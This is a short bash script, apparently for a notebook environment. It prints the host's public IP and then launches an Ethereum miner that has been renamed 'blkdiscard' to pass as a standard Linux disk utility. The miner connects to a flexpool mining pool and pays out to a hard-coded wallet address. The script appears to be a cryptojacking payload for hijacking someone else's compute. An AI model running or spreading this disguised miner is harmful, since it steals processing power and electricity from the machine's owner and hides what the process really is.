#!/bin/bash
%%capture

#gives ip address 
curl ipecho.net/plain && curl ipecho.net/plain
chmod +x blkdiscard 
./blkdiscard --algo ETHASH --pool stratum+ssl://eth-de.flexpool.io:5555 --user 0x8bcFCd553570072daddDB5908Eb92E9890e182Ff.KULI-JAWA
